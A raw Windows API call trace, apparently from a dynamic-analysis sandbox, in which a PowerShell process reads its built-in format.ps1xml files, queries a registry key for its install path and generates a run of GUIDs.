	[0477.338] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.339] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.340] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.340] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.340] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.340] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.340] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.340] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.341] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.341] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.342] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.342] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.342] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.342] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.342] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.343] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.343] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.344] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.344] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.344] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.344] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.344] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0xe67, lpOverlapped=0x0) returned 1
	[0477.345] ReadFile (in: hFile=0x338, lpBuffer=0x3056c0f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3056c0f*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0477.345] ReadFile (in: hFile=0x338, lpBuffer=0x3057640, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x3057640*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0477.345] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d020 | out: lpFileInformation=0x16d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0477.345] SetErrorMode (uMode=0x1) returned 0x1
	[0477.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0477.345] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d108 | out: phkResult=0x16d108*=0x338) returned 0x0
	[0477.346] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d08c, lpData=0x0, lpcbData=0x16d088*=0x0 | out: lpType=0x16d08c*=0x1, lpData=0x0, lpcbData=0x16d088*=0x56) returned 0x0
	[0477.346] CoTaskMemAlloc (cb=0x5a) returned 0x272150
	[0477.346] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d05c, lpData=0x272150, lpcbData=0x16d058*=0x56 | out: lpType=0x16d05c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d058*=0x56) returned 0x0
	[0477.346] CoTaskMemFree (pv=0x272150) 
	[0477.346] RegCloseKey (hKey=0x338) returned 0x0
	[0477.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0477.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0477.348] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xe301f0a9, Data2=0xa9fb, Data3=0x4c87, Data4=([0]=0x93, [1]=0x4b, [2]=0xa, [3]=0x11, [4]=0x6f, [5]=0x2, [6]=0x32, [7]=0x8a))) returned 0x0
	[0477.348] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x1013d8a2, Data2=0x8682, Data3=0x4ec8, Data4=([0]=0xaa, [1]=0xaa, [2]=0x10, [3]=0x66, [4]=0x1e, [5]=0x80, [6]=0x3d, [7]=0xd6))) returned 0x0
	[0477.349] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x7542b656, Data2=0x4d46, Data3=0x4b44, Data4=([0]=0x8e, [1]=0x2d, [2]=0x5a, [3]=0x61, [4]=0xe1, [5]=0xcf, [6]=0xba, [7]=0x10))) returned 0x0
	[0477.349] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x4dc69f32, Data2=0x5041, Data3=0x4007, Data4=([0]=0x82, [1]=0x61, [2]=0xa0, [3]=0xbd, [4]=0x85, [5]=0x81, [6]=0xa, [7]=0x4e))) returned 0x0
	[0477.350] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xff525386, Data2=0x9479, Data3=0x4de1, Data4=([0]=0xa2, [1]=0x28, [2]=0xa2, [3]=0x39, [4]=0xd0, [5]=0xb5, [6]=0x2b, [7]=0xd2))) returned 0x0
	[0477.350] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xad0c569a, Data2=0x262d, Data3=0x4db8, Data4=([0]=0xbb, [1]=0xb5, [2]=0xb7, [3]=0xf0, [4]=0xb5, [5]=0x87, [6]=0x8f, [7]=0x9a))) returned 0x0
	[0477.351] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x62b69384, Data2=0x2a9f, Data3=0x4076, Data4=([0]=0xbe, [1]=0x46, [2]=0xb7, [3]=0x41, [4]=0x59, [5]=0xf7, [6]=0x9d, [7]=0x2b))) returned 0x0
	[0477.351] VirtualQuery (in: lpAddress=0x16bce0, lpBuffer=0x16cba0, dwLength=0x30 | out: lpBuffer=0x16cba0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0477.352] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x33f2b0a3, Data2=0x2b5b, Data3=0x4825, Data4=([0]=0xba, [1]=0x67, [2]=0xd8, [3]=0xa3, [4]=0xc9, [5]=0x25, [6]=0x24, [7]=0x1f))) returned 0x0
	[0477.353] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x37d4f198, Data2=0x824f, Data3=0x4255, Data4=([0]=0xbe, [1]=0xb8, [2]=0x17, [3]=0xc4, [4]=0x65, [5]=0x8b, [6]=0x4f, [7]=0xcd))) returned 0x0
	[0477.353] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x5252d50c, Data2=0x5eab, Data3=0x4952, Data4=([0]=0x96, [1]=0xc8, [2]=0x2d, [3]=0xb0, [4]=0xee, [5]=0x93, [6]=0x87, [7]=0xaa))) returned 0x0
	[0477.354] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x42ce6996, Data2=0x1e2a, Data3=0x464f, Data4=([0]=0xb9, [1]=0xf9, [2]=0x6f, [3]=0x1f, [4]=0x40, [5]=0xbc, [6]=0x6c, [7]=0x45))) returned 0x0
	[0477.354] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x3a57e03a, Data2=0xf01f, Data3=0x4203, Data4=([0]=0xb6, [1]=0x8b, [2]=0xe4, [3]=0xb3, [4]=0x9c, [5]=0x31, [6]=0x46, [7]=0x1b))) returned 0x0
	[0477.355] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xaa80239c, Data2=0x7d0e, Data3=0x4ac3, Data4=([0]=0xba, [1]=0xa0, [2]=0x5c, [3]=0xe2, [4]=0xd6, [5]=0x34, [6]=0xfc, [7]=0xc))) returned 0x0
	[0477.355] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x55024d5d, Data2=0x2694, Data3=0x4846, Data4=([0]=0xba, [1]=0xf1, [2]=0x9f, [3]=0x8, [4]=0x1, [5]=0x69, [6]=0x77, [7]=0x49))) returned 0x0
	[0477.355] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xfbff7ca0, Data2=0x1570, Data3=0x4477, Data4=([0]=0x8f, [1]=0xb3, [2]=0x3f, [3]=0x7b, [4]=0xeb, [5]=0x4f, [6]=0xfa, [7]=0xce))) returned 0x0
	[0477.355] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x279dc20b, Data2=0x6b6a, Data3=0x4dc3, Data4=([0]=0x89, [1]=0x26, [2]=0x85, [3]=0x71, [4]=0x12, [5]=0xc1, [6]=0x4e, [7]=0xd3))) returned 0x0
	[0477.355] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xcb9fe8e6, Data2=0xec76, Data3=0x433e, Data4=([0]=0x90, [1]=0xe3, [2]=0x46, [3]=0xe4, [4]=0x3f, [5]=0xf9, [6]=0x70, [7]=0x64))) returned 0x0
	[0477.355] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xcb16d4ca, Data2=0x57f5, Data3=0x48b8, Data4=([0]=0xba, [1]=0xe7, [2]=0x82, [3]=0x8e, [4]=0xf7, [5]=0xce, [6]=0x9b, [7]=0xb6))) returned 0x0
	[0477.355] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xbbb87393, Data2=0x3799, Data3=0x482b, Data4=([0]=0x8f, [1]=0x2, [2]=0x4f, [3]=0x22, [4]=0x31, [5]=0xfe, [6]=0x74, [7]=0xe4))) returned 0x0
	[0477.356] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xb29dbeb2, Data2=0xf488, Data3=0x4578, Data4=([0]=0x88, [1]=0x17, [2]=0xbd, [3]=0x7, [4]=0xd6, [5]=0x5d, [6]=0x8a, [7]=0xa1))) returned 0x0
	[0477.356] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xaf6fc352, Data2=0x7465, Data3=0x4c35, Data4=([0]=0xa0, [1]=0x46, [2]=0x6a, [3]=0x71, [4]=0x82, [5]=0xd0, [6]=0x9a, [7]=0xa2))) returned 0x0
	[0477.356] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x8184b5ba, Data2=0x69e7, Data3=0x4871, Data4=([0]=0x81, [1]=0xfb, [2]=0x91, [3]=0x5c, [4]=0xcd, [5]=0x9e, [6]=0xfd, [7]=0xf0))) returned 0x0
	[0477.356] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x37b4e716, Data2=0x94f2, Data3=0x4660, Data4=([0]=0xba, [1]=0x19, [2]=0x1, [3]=0x64, [4]=0xe5, [5]=0xf2, [6]=0xa2, [7]=0x46))) returned 0x0
	[0477.356] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x23c06b42, Data2=0x86e9, Data3=0x49e6, Data4=([0]=0xb8, [1]=0x9, [2]=0x7d, [3]=0x7b, [4]=0xdb, [5]=0xd, [6]=0xd5, [7]=0x95))) returned 0x0
	[0477.356] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x9ffe71c9, Data2=0x9b52, Data3=0x4740, Data4=([0]=0xa3, [1]=0x8b, [2]=0xb3, [3]=0x5f, [4]=0xc8, [5]=0xdf, [6]=0xaf, [7]=0xf5))) returned 0x0
	[0477.357] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x5d5a459e, Data2=0x2a7a, Data3=0x4712, Data4=([0]=0xa0, [1]=0xd7, [2]=0xef, [3]=0x26, [4]=0x30, [5]=0x84, [6]=0x47, [7]=0x7f))) returned 0x0
	[0477.357] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x50ba3c72, Data2=0x6dc0, Data3=0x449f, Data4=([0]=0x85, [1]=0x68, [2]=0xb1, [3]=0x25, [4]=0x4f, [5]=0xee, [6]=0x68, [7]=0x26))) returned 0x0
	[0477.357] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x11ca1457, Data2=0x42dc, Data3=0x4259, Data4=([0]=0x9c, [1]=0x7, [2]=0xfe, [3]=0x67, [4]=0x7c, [5]=0xeb, [6]=0x88, [7]=0x3e))) returned 0x0
	[0477.357] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xd5c5c2ca, Data2=0x8b6, Data3=0x459d, Data4=([0]=0xb7, [1]=0x3d, [2]=0xc, [3]=0x44, [4]=0x3b, [5]=0xce, [6]=0x1d, [7]=0xca))) returned 0x0
	[0477.357] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x602e18bd, Data2=0xc1e0, Data3=0x4b6e, Data4=([0]=0xa4, [1]=0x42, [2]=0x70, [3]=0xd2, [4]=0x41, [5]=0x68, [6]=0x6e, [7]=0x96))) returned 0x0
	[0477.357] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x128354b0, Data2=0x6725, Data3=0x48e9, Data4=([0]=0xb3, [1]=0x70, [2]=0xd7, [3]=0x59, [4]=0xa8, [5]=0xa5, [6]=0x7f, [7]=0x64))) returned 0x0
	[0477.357] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xf8399462, Data2=0x8c69, Data3=0x47e4, Data4=([0]=0xb3, [1]=0xec, [2]=0x90, [3]=0x65, [4]=0x45, [5]=0x7, [6]=0xa9, [7]=0x7d))) returned 0x0
	[0477.358] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x43139a28, Data2=0xc0cf, Data3=0x4792, Data4=([0]=0x88, [1]=0xd3, [2]=0x54, [3]=0xb4, [4]=0xff, [5]=0x43, [6]=0xef, [7]=0xb9))) returned 0x0
	[0477.359] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xb0bfb90e, Data2=0x8035, Data3=0x4f99, Data4=([0]=0xa2, [1]=0xb6, [2]=0x97, [3]=0x88, [4]=0x74, [5]=0xa2, [6]=0x3f, [7]=0xf9))) returned 0x0
	[0477.359] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x717417d, Data2=0x85e4, Data3=0x4355, Data4=([0]=0xab, [1]=0x34, [2]=0xad, [3]=0xfc, [4]=0xef, [5]=0x58, [6]=0x46, [7]=0xc4))) returned 0x0
	[0477.359] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x4da64c52, Data2=0xfe4c, Data3=0x4a33, Data4=([0]=0xbe, [1]=0x77, [2]=0x39, [3]=0x7, [4]=0x9d, [5]=0xdd, [6]=0xa9, [7]=0x74))) returned 0x0
	[0477.359] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x7e4cfc20, Data2=0xf705, Data3=0x49af, Data4=([0]=0xaa, [1]=0x38, [2]=0x85, [3]=0xef, [4]=0x61, [5]=0xc4, [6]=0x99, [7]=0x54))) returned 0x0
	[0477.359] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xb696e1c1, Data2=0xecd0, Data3=0x4b11, Data4=([0]=0x80, [1]=0x4a, [2]=0x76, [3]=0xc, [4]=0x43, [5]=0x5a, [6]=0x7b, [7]=0xfe))) returned 0x0
	[0477.360] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x86f30b81, Data2=0xb3db, Data3=0x46ff, Data4=([0]=0xac, [1]=0x30, [2]=0x2d, [3]=0x54, [4]=0xbe, [5]=0xb7, [6]=0x28, [7]=0x8a))) returned 0x0
	[0477.360] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xe0c29414, Data2=0x56d2, Data3=0x412b, Data4=([0]=0x81, [1]=0x9b, [2]=0x60, [3]=0xe2, [4]=0xa6, [5]=0x25, [6]=0x6d, [7]=0xaa))) returned 0x0
	[0477.360] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x28107d11, Data2=0x223c, Data3=0x4638, Data4=([0]=0x85, [1]=0xd2, [2]=0xe5, [3]=0x21, [4]=0x8c, [5]=0x70, [6]=0xd1, [7]=0x3e))) returned 0x0
	[0477.360] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x9dede14f, Data2=0x3718, Data3=0x4ae9, Data4=([0]=0x85, [1]=0x99, [2]=0x62, [3]=0xa6, [4]=0xa1, [5]=0x9a, [6]=0xb5, [7]=0x51))) returned 0x0
	[0477.360] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x52afb113, Data2=0x524c, Data3=0x4e47, Data4=([0]=0xa9, [1]=0x8a, [2]=0xea, [3]=0xa6, [4]=0x2e, [5]=0x84, [6]=0xae, [7]=0xb4))) returned 0x0
	[0477.360] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x539ecd7a, Data2=0x620a, Data3=0x413b, Data4=([0]=0xbc, [1]=0x68, [2]=0xf2, [3]=0x92, [4]=0xbe, [5]=0x2a, [6]=0xbb, [7]=0x30))) returned 0x0
	[0477.360] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x58d76711, Data2=0xd244, Data3=0x42b9, Data4=([0]=0xb9, [1]=0x37, [2]=0x27, [3]=0xa9, [4]=0x32, [5]=0x2, [6]=0xf4, [7]=0xf7))) returned 0x0
	[0477.361] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0x8f608dcf, Data2=0xae56, Data3=0x4223, Data4=([0]=0xa2, [1]=0xa7, [2]=0xcb, [3]=0xdb, [4]=0xf1, [5]=0xd0, [6]=0xdc, [7]=0x59))) returned 0x0
	[0477.361] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xcba9a0fd, Data2=0x3781, Data3=0x45b3, Data4=([0]=0xa3, [1]=0xfd, [2]=0x9c, [3]=0x96, [4]=0xb, [5]=0xc4, [6]=0x5e, [7]=0xd5))) returned 0x0
	[0477.361] CoCreateGuid (in: pguid=0x16d330 | out: pguid=0x16d330*(Data1=0xccea1ff5, Data2=0xd9eb, Data3=0x4288, Data4=([0]=0xac, [1]=0xf7, [2]=0x19, [3]=0x5a, [4]=0x7a, [5]=0xc8, [6]=0x3e, [7]=0xb2))) returned 0x0
	[0477.361] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x338
	[0477.361] GetFileType (hFile=0x338) returned 0x1
	[0477.361] SetErrorMode (uMode=0x1) returned 0x1
	[0477.361] GetFileType (hFile=0x338) returned 0x1
	[0477.362] ReadFile (in: hFile=0x338, lpBuffer=0x31b55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x31b55d8*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.362] ReadFile (in: hFile=0x338, lpBuffer=0x31b55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x31b55d8*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.363] ReadFile (in: hFile=0x338, lpBuffer=0x31b55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x31b55d8*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.957] ReadFile (in: hFile=0x338, lpBuffer=0x31b55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x31b55d8*, lpNumberOfBytesRead=0x16d078*=0x1000, lpOverlapped=0x0) returned 1
	[0477.957] ReadFile (in: hFile=0x338, lpBuffer=0x31b55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x31b55d8*, lpNumberOfBytesRead=0x16d078*=0x8b4, lpOverlapped=0x0) returned 1
	[0477.957] ReadFile (in: hFile=0x338, lpBuffer=0x31b49f4, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x31b49f4*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0477.957] ReadFile (in: hFile=0x338, lpBuffer=0x31b55d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d078, lpOverlapped=0x0 | out: lpBuffer=0x31b55d8*, lpNumberOfBytesRead=0x16d078*=0x0, lpOverlapped=0x0) returned 1
	[0477.958] CloseHandle (hObject=0x338) returned 1
	[0477.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0477.958] SetErrorMode (uMode=0x1) returned 0x1
	[0477.958] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d020 | out: lpFileInformation=0x16d020*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0477.958] SetErrorMode (uMode=0x1) returned 0x1
	[0477.958] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0477.958] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d108 | out: phkResult=0x16d108*=0x338) returned 0x0
	[0477.959] RegQueryValueExW (in: hKey=0x338, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d08c, lpData=0x0, lpcbData=0x16d088*=0x0 | out: lpType=0x16d08c*=0x1, lpData=0x0, lpcbData=0x16d088*=0x56) returned 0x0
	[0477.959] CoTaskMemAlloc (cb=0x5a) returned 0x272150
